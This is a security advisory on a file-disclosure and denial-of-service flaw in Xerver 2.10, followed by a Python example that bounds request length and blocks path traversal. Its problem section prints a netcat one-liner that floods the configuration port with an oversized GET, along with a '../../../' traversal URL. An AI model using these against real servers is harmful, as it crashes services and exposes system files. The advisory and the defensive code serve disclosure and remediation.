COMMAND

    Xerver web server file disclosure & DoS attack

SYSTEMS AFFECTED

    Xerver 2.10

PROBLEM

    Alex Hernandez [al3xhernandez@ureach.com] says :

    The port 32123 is used for server configuration; you may crash it by
    calling the C: drive several times :

        http://localhost:32123

        $ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" | nc -vvn 127.0.0.1 32123

    You may also access system files:

        http://localhost/unix/ALEX/Xerver2.10/../../../

SOLUTION

    Workaround: restrict access to the affected files and directories.

    Update (14 March 2002)
    ======
    Xerver 2.20 available at [http://www.JavaScript.nu]
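The two weaknesses above are a missing bound on request-line length (the oversized GET that crashes the configuration listener) and a missing check that a requested path stays inside the document root (the `../../../` disclosure). The following added example, which is not Xerver's code and not part of the advisory, shows how a request handler can enforce both: it rejects request lines over a size limit before doing any parsing, percent-decodes the URL path, refuses any `..` segment (including backslash variants), and confirms the resolved path still sits under the document root. The `DOCROOT` and `MAX_REQUEST_LINE` values are assumptions chosen for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed values for this example; the advisory gives no server configuration.
DOCROOT = "/srv/www"          # hypothetical document root
MAX_REQUEST_LINE = 8192       # bytes; bound enforced before any parsing work


def resolve_path(docroot, url_path):
    """Map a URL path onto docroot; return None if it would escape docroot."""
    # Percent-decode first so encoded dots (%2e%2e) cannot slip past the check,
    # then treat backslashes like forward slashes, as Windows filesystems do.
    decoded = unquote(url_path).replace("\\", "/")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None               # explicit traversal: refuse instead of collapsing it
    candidate = posixpath.normpath(posixpath.join(docroot, *segments))
    # Defence in depth: the resolved path must still share docroot as its prefix.
    if posixpath.commonpath([docroot, candidate]) != docroot:
        return None
    return candidate


def handle_request_line(line, docroot=DOCROOT, limit=MAX_REQUEST_LINE):
    """Parse 'GET <path> HTTP/x.y' under a hard size bound; return (status, path)."""
    if len(line) > limit:
        return 414, None          # URI Too Long: drop it before parsing or allocating
    parts = line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return 400, None
    target = resolve_path(docroot, parts[1])
    if target is None:
        return 403, None          # traversal attempt: forbidden, and worth logging
    return 200, target


if __name__ == "__main__":
    # Constructed request lines modelled on the advisory's two cases.
    for req in ("GET /index.html HTTP/1.0",
                "GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0",
                "GET /" + "C:/" * 500000 + " HTTP/1.0"):
        status, path = handle_request_line(req)
        print(status, path, "(request line length %d)" % len(req))
```

The length check comes first deliberately: the oversized request in the advisory is cheap for the client to send and must be discarded before the server spends memory or CPU on it. Rejecting `..` outright rather than normalizing it away keeps the 403 visible in logs, which is what a defender wants to see when traversal is attempted.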